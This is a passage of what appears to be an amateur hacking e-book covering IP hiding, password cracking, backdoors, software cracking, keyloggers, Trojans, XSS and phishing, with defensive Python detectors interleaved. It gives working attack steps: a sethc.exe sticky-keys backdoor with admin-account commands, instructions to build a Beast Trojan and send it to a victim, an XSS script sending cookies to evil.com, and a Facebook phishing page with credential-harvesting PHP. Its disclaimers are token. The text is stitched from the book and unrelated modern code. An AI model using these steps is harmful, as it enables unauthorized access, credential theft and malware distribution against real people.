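        if best_size >= threshold:
            burst = hits[best_start:best_start + best_size]
            alerts.append({
                "host": host,
                "parent": parent,
                "first_seen": burst[0][0].isoformat(),
                "kills": sum(1 for _, kind in burst if kind == "process-kill"),
                "deletes": sum(1 for _, kind in burst if kind == "program-files-delete"),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_tamper_bursts(SAMPLE_EVENTS):
        print(alert)
```

A single `tskill` by an administrator does not trip the rule; the signal is the volume and the shared parent, which also holds when the script is wrapped in an executable.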
.....
6. Change & Hide IP Address
How To Hide IP Address?
Method 1 :
In Windows,
1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "cmd" and hit Enter.
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "Properties”.
You should now be on a screen with something titled "Local Area Connection",
or something close to that, and, if you have a network hooked up, all of your
other networks.
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General"
tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until I fill
the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with
default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again
You should now be back to the "Local Area Connection" screen.
15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address
With a little practice, you can easily get this process down to 15 seconds.
“This only changes your dynamic IP address, not your ISP/IP address. If you plan on
hacking a website with this trick be extremely careful, because if they try a little, they
can trace it back.”
Method 2 :
Hiding the IP address is one of the biggest concerns of all Hackers as the IP Address can
reveal the identity of the Hacker. It’s just like your online address. If anyone can find
your actual online address (IP Address), tracing you back won’t be that difficult. Thus it
is very important to hide or change your IP address before doing any kind of hacking
attack or even think of doing so. After getting hundreds of request on a tutorial on how
to hide your IP address, here I am writing a detailed step by step tutorial on how to hide
or change ip address.
We are using the proxy service called Hide My Ass (Pro VPN).
What’s that? Let me explain in detail. We all know about proxy servers. They help us to
hide your ip address or change ip address but there are many things you guys don’t
know.
1. Free proxies are not completely anonymous. Your IP can be disclosed by the
website owner to the concerned authorities if needed.
2. Companies limit the maximum speed of browsing in free proxies. Say your
internet speed is 8 Mbps, still using free proxies you can browse internet with a
speed of only 265 kbps. This is irritating, isn’t it?
3. Many Webmasters can block users accessing free proxies.
Even I wanted a reliable and Elite Proxy which can help me completely hide my Online
Identity and what else could be better than changing my IP address every minute. I
looked for many solutions online and then I found the PRO VPN of Hide My Ass.
To be very honest, in the beginning I was a bit confused when I saw the software. I was
not very sure if it would work the way I wanted to but then I gave it a try. I thought of
giving it a try just for 1 month. It was just for $11.52 then, now it costs $9.99 only. I
could actually think of spending $11.52 for my only if it gave me the kind of anonymity
I wanted on internet. It helped me secure my online Identity.
Here are benefits I got after using the PRO VPN of Hide My Ass.
1. Super fast, high speed elite / anonymous proxies. Elite proxies are 100 times
more secure than free proxies
2. I could select the country whose IP address I wanted in just 1 click. It offers over
38000+ unique IP Address from 53 different countries.
3. I can set the timer to automatically change the IP Address. This way my IP
Address gets changed every minute without me bothering to do so. If I am
implementing a hacking attack, no-one could actually find my actual IP Address
so I am always on the safer side.
4. It anonymously encrypts all the traffic and works with all kind of platforms.
Unlike free proxies the PRO VPN of Hide My Ass is not blocked by the websites.
The traffic seems to be of legitimate human users, not proxies so no one can catch
you using them.
Once you enter the Software Dashboard, you get the interface shown.
We can select the IP Address of the country we want. There are 53+ countries and
38,000+ IP Address to choose from. We also get the provision to set the IP timeout i.e. we
can select the time after which each IP Address should change and we get a new IP
Address. It is a simple one click setting. Now that you guys have everything in front of
you, you can imagine how easy it is to change the IP Address automatically using
the Hide My Ass Pro VPN. This surely is the best proxy service out there. I was so
overwhelmed by its response that I decided to write a detailed review about its
performance. If you are still in doubt just go and give it a try.
It surely is worth it. I am sure you can spend $9.99 for your online security. It can
actually save you from $$$$ loss and at the same time secure your online identity by
making you anonymous.
Hide My Ass : www.hidemyass.com
There are many other benefits of using this service. This post has already become too
long so will not stretch it more, maybe i will soon write another blog post for you guys
describing how this best proxy service can help you from getting hacked and increase
your online security by continuously changing your ip address.
How To Change IP Address?
IP address is an address that shows your location while you are using internet..
Therefore you must change your IP address to change your actual location when you are
performing any activity related to hacking..
A software called Multiproxy is used to change the location IP address of system.
How To Use ?
1. Open Multiproxy
2. Option
3. Proxy Server List
4. Menu
5. Add
6. Done !!! (click cancel to Minimize..)
Download Multiproxy : http://www32.zippyshare.com/v/23skLare/file.html
...
7. Change MAC Address?
MAC (Media Access Control) is an address in computer system that shows the physical
address of system. This address is same as IMEI no. of mobile phone. You must change
this address to hide your real Identity.
A software TMAC is used to change MAC address of system..
How To Use?
1. Open TMAC
2. Random MAC Address
3. Changes (Click on Restore Original to set original MAC Address..)
...
8. System Password Cracking
Windows
Change Windows System Password Without Using Current Password :
As We Know That We Need Current Password To Change The System Password But
There Is A Trick To Change The System Password With Out Using Current Password.
Just Follow The Simple Steps :
1. Right Click On Computer
2. Manage [ Run > compmgmt.msc ]
3. Local User And Group
4. User
5. Right Click On Target User
6. Set Password
7. Proceed
8. Enter New Password..
9. Done..
Crack Windows System Log In Password :
You can trace the password of any computer system using OPH Crack..
It’s A Linux Based Live OS.. OPH Crack Works On The Concept Of Brute Force
Attack. It Makes All The Combination Of Keys From Your Keyboard And Matches To
SAM File Where Password Of Windows Is Saved. It Matches 7 Lakh Passwords In A
Second..
How To Use OPHCrack?
Simply download the Ophcrack ISO and burn it to a CD (or load it onto a USB drive via
UNetbootin). Insert the CD into a machine you would like to gain access to, then press
and hold the power button until the computer shuts down. Turn the computer back on
and enter BIOS at startup. Change the boot sequence to CD before HDD, then save and
exit.
The computer will restart and Ophcrack will be loaded. Sit back and watch as it does all
the work for you. Write down the password it gives you, remove the disc, restart the
computer, and log in as if it were your own machine.
Download OPH Crack : http://ophcrack.sourceforge.net
Linux
Linux is an operating system which is quickly gaining popularity in mainstream, but
not so common that you’re likely to come across it. Though Mac and Linux are both
based on UNIX, it is easier to change the password in Linux than it is OS X.
To change the password, turn on the computer and press the ESC key when GRUB
appears. Scroll down and highlight ‘Recovery Mode’ and press the ‘B’ key; this will
cause you to enter ‘Single User Mode’.
You’re now at the prompt, and logged in as ‘root’ by default. Type ‘passwd’ and then
choose a new password. This will change the root password to whatever you enter. If
you’re interested in only gaining access to a single account on the system, however, then
type ‘passwd username’ replacing ‘username’ with the login name for the account you
would like to alter the password for.
MAC
Finally we take on Mac’s OS X which as we said earlier is based on UNIX and is difficult
to change password compared to Linux but nothing is impossible to be hacked.
The easiest method would be to use Ophcrack on this also as it works with Mac and
Linux in addition to Windows. However, there are other methods that can be used, as
demonstrated below.
If the Mac runs OS X 10.4, then you only need the installation CD. Insert it into the
computer, reboot. When it starts up, select UTILITIES > RESET PASSWORD. Choose a
new password and then use that to log in. If the Mac runs OS X 10.5, restart the
computer and press COMMAND + S. When at the prompt, type :
fsck -fy
mount -uw /
launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist
dscl . -passwd /Users/UserName newpassword
...
9. Backdoor
Backdoor Means A Hidden Way To Enter In Any System. We Make A Backdoor To Be
Able To Open The System Of Anyone At Anytime.
But We Must Get The Target System Logged In As Administrator Once When We Have
To Make Backdoor.
(System Is Locked ??? Read Previous Article 9. Password Cracking)
Now Just Follow These Simple Steps To Creating Backdoor On Windows :
1. Open Computer > System Drive (C:/) > Windows > System32
2. Copy CMD
3. Paste On Desktop
4. Rename As Sethc
5. Cut This Renamed File
6. Paste Into System32
7. Move And Replace
8. Done !!!
Now Whenever You Press Shift 5 Times, Cmd Will Be Opened.. This Function Also
Works On The Log On Screen.. Now When You Are At System Log In Screen Press Shift
5 Times.
Booom !!!!! CMD Will Be Opened..
Now Create A New User Account, Make User As Admin, Then Log On As New User
Account (Admin).. This Trick Helps You To Access Any System Making New User And
You Can Delete It After Work :
Command To Make New User : net user username /add
Command To Make User As Administrator : net localgroup administrators username /add
Command To Delete The User : net user username /del
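The file swap described above leaves sethc.exe byte-identical to cmd.exe, which makes it easy to audit for. The check below is an added example, not part of the original book; the function names are hypothetical and the two directories it builds for the demonstration are constructed stand-ins for a System32 folder.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path):
    """Hash a file in chunks so large binaries do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def check_sticky_keys(system32, watched=("sethc.exe",), shells=("cmd.exe",)):
    """Report watched accessibility binaries that are missing or identical to a shell.

    `system32` may be a live System32 directory or the same folder inside a
    mounted disk image. `watched` and `shells` can be extended by the caller.
    """
    system32 = Path(system32)
    shell_hashes = {}
    for shell in shells:
        candidate = system32 / shell
        if candidate.is_file():
            shell_hashes[sha256_of(candidate)] = shell

    findings = []
    for name in watched:
        target = system32 / name
        if not target.is_file():
            findings.append((name, "missing"))
            continue
        twin = shell_hashes.get(sha256_of(target))
        if twin:
            findings.append((name, f"identical to {twin}"))
    return findings


def demo():
    """Build one clean and one tampered directory (constructed contents) and audit both."""
    with tempfile.TemporaryDirectory() as tmp:
        clean = Path(tmp, "clean")
        clean.mkdir()
        (clean / "cmd.exe").write_bytes(b"constructed cmd image")
        (clean / "sethc.exe").write_bytes(b"constructed sethc image")

        swapped = Path(tmp, "swapped")
        swapped.mkdir()
        (swapped / "cmd.exe").write_bytes(b"constructed cmd image")
        (swapped / "sethc.exe").write_bytes(b"constructed cmd image")

        return check_sticky_keys(clean), check_sticky_keys(swapped)


if __name__ == "__main__":
    clean_result, swapped_result = demo()
    print("clean:  ", clean_result)
    print("swapped:", swapped_result)
```

A hash match only catches a straight copy; new local accounts added to the administrators group shortly after a logon-screen event are a second signal worth correlating.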
...
10. Software Hacking
As We Know That We Use Much Software To Accomplish Our Task Or Application.
These Types Of Software Are Known As Application Software.
We Have To Purchase The Software To Use It Otherwise We Can Download It From
Internet. We Can Use This Downloaded Software Till 30 Day Or 15 Days Because The
Software Would Be Trial Version.
A Software Time Stopper Is Used To Break This Limitation Of Software And We Can
Use The Trial Version Of Software Forever
1. Open Time Stopper
2. Select Exe File Of Trial Version Software
3. Select A New Date
4. Enter Any Name For New Exe File
5. Click On Create Desktop Shortcut
After That We Have To Install This New Exe File, The Installed Software Will Be Same
As Original (Purchased Software).
Download Time Stopper : http://www57.zippyshare.com/v/KDd3rw8H/file.html
Microsoft Office Hacking
As We Know That We Can Set Any Password In Any File Of Microsoft Office Like Word,
Excel, Power Point Etc. But Hackers Can Break This Security Password With The Help
Of Software Called MS Office Password Recovery. It Traces The Password Of File
Using Brute Force Attack Technique.
1. Open Password Unlocker
2. Open Target File
3. Click On Start
You Will Get Password Within Sometimes..
Download MS Office P.R. : http://www34.zippyshare.com/v/m4VKFoyI/file.html
...
11. Keylogger
Keylogger is a software program or hardware device that is used to monitor and log each
of the keys a user types into a computer keyboard. The user who installed the program
or hardware device can then view all keys typed in by that user. Because these
programs and hardware devices monitor the keys typed in a user can easily find user
passwords and other information a user may not wish others to know about. Keyloggers,
as a surveillance tool, are often used by employers to ensure employees use work
computers for business purposes only. Unfortunately, keyloggers can also be embedded
in spyware allowing your information to be transmitted to an unknown third party.
About Keyloggers :
A keylogger is a program that runs in the background, recording all the keystrokes.
Once keystrokes are logged, they are hidden in the machine for later retrieval, or
shipped raw to the attacker. The attacker then peruses them carefully in the hopes of
either finding passwords, or possibly other useful information that could be used to
compromise the system or be used in a social engineering attack. For example, a
keylogger will reveal the contents of all e-mail composed by the user. Keylogger is
commonly included in rootkits.
A keylogger normally consists of two files: a DLL which does all the work and an EXE
which loads the DLL and sets the hook. Therefore when you deploy the hooker on a
system, two such files must be present in the same directory.
There Are Other Approaches To Capturing Info About What You Are
Doing.
Some keyloggers capture screens, rather than keystrokes.
Other keyloggers will secretly turn on video or audio recorders, and transmit what
they capture over your internet connection.
A keylogger might be as simple as an exe and a dll that are placed on a machine and
invoked at boot via an entry in the registry. Or a keylogger could be one which boasts these
features :
Stealth: invisible in process list
Includes kernel keylogger driver that captures keystrokes even when user is
logged off (Windows 2000 / XP)
ProBot program files and registry entries are hidden (Windows 2000 / XP)
Includes Remote Deployment wizard
Active window titles and process names logging
Keystroke / password logging
Regional keyboard support
Keylogging in NT console windows
Launched applications list
Text snapshots of active applications.
Visited Internet URL logger
Capture HTTP POST data (including logins/passwords)
File and Folder creation/removal logging
Mouse activities
Workstation user and timestamp recording
Log file archiving, separate log files for each user
Log file secure encryption
Password authentication
Invisible operation
Native GUI session log presentation
Easy log file reports with Instant Viewer 2 Web interface
HTML and Text log file export
Automatic E-mail log file delivery
Easy setup & uninstall wizards
Support for Windows (R) 95/98/ME and Windows (R) NT/2000/XP
Because a keylogger can involve dozens of files, and has as a primary goal complete
stealth from the user, removing one manually can be a terrifying challenge to any
computer user. Incorrect removal efforts can result in damage to the operating system,
instability, inability to use the mouse or keyboard, or worse. Further, some key loggers
will survive manual efforts to remove them, re-installing themselves before the user
even reboots.
Download REFOG Key Logger : https://www.refog.com
...
12. Trojans
A Trojan is a malicious program disguised as some very important application. Trojans
come on the backs of other Programs and are installed on a system without the User’s
knowledge. Trojans are malicious pieces of code used to install hacking software on a
target system and aid the Hacker in gaining and retaining access to that system.
Trojans and their counterparts are important pieces of the Hacker’s tool-kit.
A Trojan is a program that appears to perform a desirable and necessary function but
that, because of hidden and Unauthorized code, performs functions unknown and
unwanted by the user. These downloads are fake programs which seem to be an original
application; it may be a software like monitoring program, system virus scanners,
registry cleaners, computer system optimizers, or they may be applications like songs,
pictures, screen savers, videos, etc..
You just need to execute that software or application, you will find the
application running or you might get an error, but once executed the Trojan will
install itself in the system automatically.
Once installed on a system, the program then has system-level access on the
target system, where it can be destructive and insidious. They can cause data
theft and loss, and system crashes or slowdowns; they can also be used as
launching points for other attacks against your system.
Many Trojans are used to manipulate files on the victim computer, manage
processes, remotely run commands, intercept keystrokes, watch screen images,
and restart or shut down infected hosts.
Different Types of Trojans
1. Remote Administration Trojans: There are Remote Access Trojans which are
used to control the Victim’s Computer remotely.
2. Data Stealing Trojans: Then there are Data Sending Trojans which compromise
the data in the Victim’s computer, then find the data on the computer and send it
to the attacker automatically.
3. Security Disabler Trojan: There are Security software disablers Trojans which
are used to stop antivirus software running in the Victim’s computer.
In most of the cases the Trojan comes as a Remote Administration Tool which turns the
Victim’s computer into a server which can be controlled remotely. Once the Remote Access
Trojan is installed in the system, the attacker can connect to that computer and can
control it.
Components of Trojans :
Trojan consists of two parts :
1. A Client component
2. A Server component.
One which resides on the Victim’s computer is called the server part of the Trojan and
the one which is on the attacker’s computer is called the client Part of the Trojan. For
the Trojan to function as a backdoor, the server Component has to be installed on the
Victim’s machine.
1. Server component of the Trojan opens a port in the Victim’s computer and
invites the Attacker to connect and administrate the computer.
2. Client component of the Trojan tries to connect the Victim’s computer and
administrate the computer without the permission of the User.
Wrapper
A Wrapper is a program used to combine two or more executables into a single packaged
program. The wrapper attaches a harmless executable, like a game, to a Trojan’s
payload, the executable code that does the real damage, so that it appears to be a
harmless file.
Hackers use Wrappers to bind the Server part of the Software behind any image or any
other file. Wrappers are also known as Binders.
Generally, games or other animated installations are used as wrappers because they
entertain the user while the Trojan is being installed. This way, the user doesn’t notice
the slower processing that occurs while the Trojan is being installed on the system; the
user only sees the legitimate application being installed.
Reverse Connection in Trojans :
Reverse-connecting Trojans let an attacker access a machine on the internal network
from the outside. The Hacker can install a simple Trojan program on a system on the
internal network. On a regular basis (usually every 60 seconds), the internal server tries
to access the external master system to pick up commands. If the attacker has typed
something into the master system, this command is retrieved and executed on the
internal system. Reverse WWW shell uses standard HTTP. It’s dangerous because it’s
difficult to detect - it looks like a client is browsing the Web from the internal network.
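The fixed polling interval is what gives a reverse connection away: a person browsing produces irregular gaps between requests, while a program checking in every 60 seconds does not. The sketch below is an added example, not part of the original book; the proxy-log records, host names and thresholds are constructed assumptions.

```python
from collections import defaultdict
from statistics import mean, pstdev


def build_sample():
    """Constructed proxy-log records: (epoch seconds, internal source, destination host)."""
    events = []
    # Machine-like traffic: one request roughly every 60 s with a little jitter.
    start = 1000
    for jitter in (0, 1, -1, 2, 0, -2, 1, 0, -1, 1):
        events.append((start + jitter, "10.0.0.23", "updates.example.net"))
        start += 60
    # Human browsing from the same host: bursts and long pauses.
    for ts in (1003, 1010, 1012, 1100, 1460, 1475, 1900, 1904):
        events.append((ts, "10.0.0.23", "news.example.org"))
    # Regular but too short a series to judge.
    for ts in (1000, 1060, 1120):
        events.append((ts, "10.0.0.40", "cdn.example.com"))
    return events


def find_beacons(events, min_events=6, max_cv=0.1):
    """Flag (source, destination) pairs whose request gaps are nearly constant.

    The coefficient of variation (standard deviation / mean) of the gaps is
    close to 0 for timer-driven traffic and well above 0.1 for interactive use.
    """
    times = defaultdict(list)
    for ts, src, dst in events:
        times[(src, dst)].append(ts)

    findings = []
    for (src, dst), stamps in times.items():
        if len(stamps) < min_events:
            continue  # not enough samples for a meaningful statistic
        stamps.sort()
        gaps = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        average = mean(gaps)
        if average <= 0:
            continue
        cv = pstdev(gaps) / average
        if cv <= max_cv:
            findings.append({
                "src": src,
                "dst": dst,
                "requests": len(stamps),
                "mean_interval_s": round(average, 1),
                "cv": round(cv, 3),
            })
    return sorted(findings, key=lambda item: item["cv"])


if __name__ == "__main__":
    for finding in find_beacons(build_sample()):
        print(finding)
```

Legitimate software updaters and telemetry agents poll on timers too, so the output is a list of destinations to review against an allow-list, not a verdict.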
Now the final part...
Detection and Removal of Trojans :
The unusual behavior of system is usually an indication of a Trojan attack.
Actions/symptoms such as,
Programs starting and running without the User’s initiation.
CD-ROM drawers Opening or Closing.
Wallpaper, background, or screen saver settings changing by themselves.
Screen display flipping upside down.
Browser program opening strange or unexpected websites
All above are indications of a Trojan attack. Any action that is suspicious or not initiated
by the user can be an indication of a Trojan attack.
One thing which you can do is to check the applications which are making network
connections with other computers.
One of those applications will be a process started by the Server Trojan.
You can also use the software named Process Explorer, which shows each process
running on the computer with its original name and its file name. Some Trojans
rename themselves after a system process that runs on the computer, so you cannot
tell the Trojan from the original system process in the Task Manager processes tab;
for that you need PROCESS EXPLORER.
Countermeasures for Trojan Attacks :
Most commercial antivirus programs have Anti-Trojan capabilities as well as spyware
detection and removal functionality. These tools can automatically scan hard drives on
startup to detect backdoor and Trojan programs before they can cause damage. Once a
system is infected, it’s more difficult to clean, but you can do so with commercially
available tools. It’s important to use commercial applications to clean a system instead
of freeware tools, because many freeware removal tools can further infect the system. In
addition, port monitoring tools can identify ports that have been opened or files that
have changed.
The key to preventing Trojans and backdoors from being installed on a system is not
to install applications downloaded from the Internet or open Email attachments from
parties you don’t know. Many systems administrators don’t give users the system
permissions necessary to install programs on system for the very same reason.
Making a Trojan using Beast v2.06
Download Beast v2.06 : http://www29.zippyshare.com/v/qVlgO9tt/file.html
& Follow These Simple Steps :
1. Open the software you will get the screen as shown below.
2. Now click on “Build server “button.
3. Now in this window click on the notifications tab.
4. In the notifications tab click on the e-mail button.
5. Now In this window fill your proper and valid email id.
6. Now go to "AV-FW kill” tab.
7. Now In this put a tick mark on the “disable XP firewall ".
8. Now click on "EXE icontab.
9. In this tab select any icon for the file from the list or you can browse the icon
from the directory and can use it.
10. Now click on the”Save Server” button and the Trojan will be made.
11. Now send this Trojan File to victim.
12. As and when the victim will install the Trojan on his system you will get a
notification e-mail on your specified email
13. id while making the Trojan. This Email consists of the IP address and port of the
victim.
14. Put This IP address and Port in the place shown in the below snap-shot.
15. After That Click on the "Go Beast” Button and You will be connected to victims
PC.
16. Now select the action or task you want to execute on victims PC form the given
list.
17. Now to destroy or kill the Trojan click on the “server “tab from the menu.
18. Now click on the “Kill Server “button and the Trojan will be destroyed from the
victims PC.
19. You are Done Now.
& Please Do Not Harm or Destroy any ones PC, This Tutorial is Only for Educational
Purpose.”
...
13. Cross Site Scripting (XSS)
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker
can execute malicious scripts (also commonly referred to as a malicious payload) into a
legitimate website or web application. XSS is amongst the most rampant of web
application vulnerabilities and occurs when a web application makes use of unvalidated
or unencoded user input within the output it generates.
By leveraging XSS, an attacker does not target a victim directly. Instead, an attacker
would exploit a vulnerability within a website or web application that the victim would
visit, essentially using the vulnerable website as a vehicle to deliver a malicious script to
the victim’s browser.
While XSS can be taken advantage of within VBScript, ActiveX and Flash (although
now considered legacy or even obsolete), unquestionably, the most widely abused is
JavaScript primarily because JavaScript is fundamental to most browsing
experiences.
How Cross-site Scripting Works?
In order to run malicious JavaScript code in a victim’s browser, an attacker must first
find a way to inject a payload into a web page that the victim visits. Of course, an
attacker could use social engineering techniques to convince a user to visit a vulnerable
page with an injected JavaScript payload.
In order for an XSS attack to take place the vulnerable website needs to directly include
user input in its pages. An attacker can then insert a string that will be used within the
web page and treated as code by the victim’s browser.
The following server-side pseudo-code is used to display the most recent comment on a
web page.
print "<html>"
print "<h1>Most recent comment</h1>"
print database.latestComment
print "</html>"
The above script is simply printing out the latest comment from a comments database
and printing the contents out to an HTML page, assuming that the comment printed out
only consists of text.
The above page is vulnerable to XSS because an attacker could submit a comment that
contains a malicious payload such as <script>doSomethingEvil();</script>.
Users visiting the web page will get served the following HTML page.
<html>
<h1>Most recent comment</h1>
<script>doSomethingEvil();</script>
</html>
When the page loads in the victim’s browser, the attacker’s malicious script will execute,
most often without the user realizing or being able to prevent such an attack.
Important Note : An XSS vulnerability can only exist if the payload (malicious script)
that the attacker inserts ultimately gets parsed (as HTML in this case) in the victim’s
browser.
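The comment page above as runnable code, next to the same page with output encoding, as an added example that is not part of the original book. It uses Python's standard `html.escape` for the fix and `html.parser` to show what an HTML parser actually treats as active content; the function and class names are hypothetical, and `doSomethingEvil()` is the placeholder payload from the text.

```python
import html
from html.parser import HTMLParser

PAGE_HEAD = "<html>\n<h1>Most recent comment</h1>\n"
PAGE_TAIL = "\n</html>"


def render_vulnerable(latest_comment):
    """The page from the pseudo-code: the stored comment is written out verbatim."""
    return PAGE_HEAD + latest_comment + PAGE_TAIL


def render_encoded(latest_comment):
    """Same page, but the comment is HTML-encoded so it can only ever be text."""
    return PAGE_HEAD + html.escape(latest_comment, quote=True) + PAGE_TAIL


class ActiveContentFinder(HTMLParser):
    """Collects what a parser sees as executable: script elements and on* attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.active = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.active.append("<script>")
        for name, _value in attrs:
            if name.startswith("on"):
                self.active.append(f"{tag}[{name}]")


def active_content(page):
    """Parse a rendered page and return the list of active elements found in it."""
    finder = ActiveContentFinder()
    finder.feed(page)
    finder.close()
    return finder.active


if __name__ == "__main__":
    # Constructed comments: one harmless, two carrying the placeholder payload.
    comments = [
        "Nice article!",
        "<script>doSomethingEvil();</script>",
        '<body onload="doSomethingEvil()">',
    ]
    for comment in comments:
        print(repr(comment))
        print("  verbatim:", active_content(render_vulnerable(comment)))
        print("  encoded: ", active_content(render_encoded(comment)))
```

`html.escape` is the right encoder for HTML body text and quoted attribute values only; data placed inside a script block, a URL or a style needs the encoder for that context.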
What’s the worst an attacker can do with JavaScript?
The consequences of what an attacker can do with the ability to execute JavaScript on a
web page may not immediately stand out, especially since browsers run JavaScript in a
very tightly controlled environment and that JavaScript has limited access to the user’s
operating system and the user’s files.
However, when considering that JavaScript has access to the following, it’s easier to
understand how creative attackers can get with JavaScript.
Malicious JavaScript has access to all the same objects the rest of the web page
has, including access to cookies. Cookies are often used to store session tokens, if
an attacker can obtain a user’s session cookie, they can impersonate that user.
JavaScript can read and make arbitrary modifications to the browser’s DOM
(within the page that JavaScript is running).
JavaScript can use XMLHttpRequest to send HTTP requests with arbitrary content
to arbitrary destinations.
JavaScript in modern browsers can leverage HTML5 APIs such as accessing a
user’s geolocation, webcam, microphone and even the specific files from the user’s
file system. While most of these APIs require user opt-in, XSS in conjunction
with some clever social engineering can bring an attacker a long way.
The above, in combination with social engineering, allow attackers to pull off advanced
attacks including cookie theft, keylogging, phishing and identity theft. Critically, XSS
vulnerabilities provide the perfect ground for attackers to escalate attacks to more
serious ones.
“Isn’t Cross-Site Scripting The User’s Problem?”
If an attacker can abuse an XSS vulnerability on a web page to execute arbitrary
JavaScript in a visitor’s browser, the security of that website or web application and its
users has been compromised. XSS is not the user’s problem; like any other security
vulnerability, if it’s affecting your users, it will affect you.
The Anatomy Of A Cross-Site Scripting Attack :
An XSS attack needs three actors : the website, the victim and the attacker.
In the example below, it shall be assumed that the attacker’s goal is to impersonate the
victim by stealing the victim’s cookie. Sending the cookie to a server the attacker
controls can be achieved in a variety of ways, one of which is for the attacker to execute
the following JavaScript code in the victim’s browser through an XSS vulnerability.
<script>
window.location=“http://evil.com/?cookie=” + document.cookie
</script>
The figure below illustrates a step-by-step walkthrough of a simple XSS attack.
1. The attacker injects a payload in the website’s database by submitting a
vulnerable form with some malicious JavaScript.
2. The victim requests the web page from the website.
3. The website serves the victim’s browser the page with the attacker’s payload as
part of the HTML body.
4. The victim’s browser will execute the malicious script inside the HTML body. In
this case it would send the victim’s cookie to the attacker’s server. The attacker
now simply needs to extract the victim’s cookie when the HTTP request arrives to
the server, after which the attacker can use the victim’s stolen cookie for
impersonation.
Some Examples Of Cross-Site Scripting Attack Vectors
The following is a non-exhaustive list of XSS attack vectors that an attacker could use to
compromise the security of a website or web application through an XSS attack. A more
extensive list of XSS payload examples is maintained here :
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
<script> tag
The <script> tag is the most straight-forward XSS payload. A script tag can either
reference external JavaScript code, or embed the code within the script tag.
<body> tag
An XSS payload can be delivered inside <body> tag by using the onload attribute or
other more obscure attributes such as the background attribute.
<img> tag
Some browsers will execute JavaScript when found in the <img>.
<iframe> tag
The <iframe> tag allows the embedding of another HTML page into the parent page. An
IFrame can contain JavaScript, however, it’s important to note that the JavaScript in
the iFrame does not have access to the DOM of the parent’s page due to the browser’s
Content Security Policy (CSP). However, IFrames are still very effective means of
pulling off phishing attacks.
<input> tag
In some browsers, if the type attribute of the <input> tag is set to image, it can be
manipulated to embed a script.
<link> tag
The <link> tag, which is often used to link to external style sheets could contain a script.
<table> tag
The background attribute of the table and td tags can be exploited to refer to a script
instead of an image.
<div> tag
The <div> tag, similar to the <table> and <td> tags can also specify a background and
therefore embed a script.
<object> tag
The <object> tag can be used to include a script from an external site.
14. Phishing
What Is Phishing?
The act of sending an Email to a user falsely claiming to be an established legitimate
enterprise in an attempt to scam the user into surrendering private information that
will be used for identity theft.
The Email directs the user to visit a Web site where they are asked to update personal
information, such as Passwords and credit card, social security, and bank account
numbers, that the legitimate organization already has. The Web site, however, is Bogus
and set up only to steal the User’s information.
Phishing attacks are Trying to steal your Money !!!
Phishing Scams Could Be
Emails inviting you to join a Social Group, asking you to Login using your
Username and Password.
Email saying that Your Bank Account is locked and Sign in to Your Account to
Unlock IT.
Emails containing some Information of your Interest and asking you to Login to
Your Account.
Any Email carrying a Link to Click and asking you to Login.
How To Create A Phishing Hack Page ?
This Hack Example Is For Facebook Account.
The Hacker can now wreak ungodly amounts of havoc on a person’s social life. If it
happens to be a business’s Facebook profile, they can damage their business. Today,
however, we are going to setup an imitation Facebook login page to show you just how
easy it is to start phishing. Let’s take a closer look at the steps required..
1. Pull up Facebook.com in your browser. Then, right click on the website’s login
page. You should see an option along the lines of “view source page.” Click on
this option and you should be able to view the code behind this page.
2. Go ahead and dump all of the page’s source code into Notepad (or your
operating system’s best simple text editor).
3. If using Notepad, hit ctrl + f (which is the find hotkey) and search for action.
4. You should see a line that looks like this :
action=”https://www.facebook.com/login.php?login_attempt=1″
5. Delete everything contained in the quotations, and instead fill the quotes
with post.php. Now it should read action=”post.php”
6. Save this file somewhere on your computer with the file name of index.htm.
Omit the final period from the filename. This is going to become your
phishing page.
7. Next, create a new notepad document with the name of post.php. Omit the
final period from the filename. Copy and paste the following code into this
document, and remember to save it :
<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
8. At this point, you should now have two files saved: index.htm and post.php.
9. Next, this code actually needs to be uploaded to a web hosting service. There
are free hosting providers, but I wouldn’t recommend you actually post this
code. Instead, it would be better to try this at home on your own webserver.
However, for the rest of the tutorial, we’ll be using 000Webhost.
10. After you have signed up for an account, browse to the control panel, and
then to file manager.
11. Once the window opens, go to public_html.
12. Delete default.php, and then upload index.htm and post.php.
13. Next, click on a preview of index.htm. As you’ll notice, it should look nearly
identical to the Facebook login page.
14. The URL of this page is what needs to be linked to in an attack. Sometimes
attackers embed this false link on other websites, forums, popup ads, and
even emails.
15. Now go back to the file manager and public_html. There should be a file
labeled username.txt.
16. Open this file and you should be able to see login credentials that have been
entered by a test user.
It really is a simple matter of copying the code from the Facebook login screen, adding
some php code, and then setting up a dummy website. Again, don’t try this in the real
world, because the consequences could be terrible. However, in a home environment on
your own web server, this tutorial provides great insight into how attackers phish for
usernames and passwords.
Prevention Against Phishing
Read all the Email Carefully and Check if the Sender is Original.
Watch the Link Carefully before Clicking
Always check the URL in the Browser before Signing IN to your Account
Always Login to Your Accounts after opening the Trusted Websites, not by
Clicking in any other Website or Email.
“Do Not Use This Hack Trick In Any Criminal Activities Like Phishing Bank
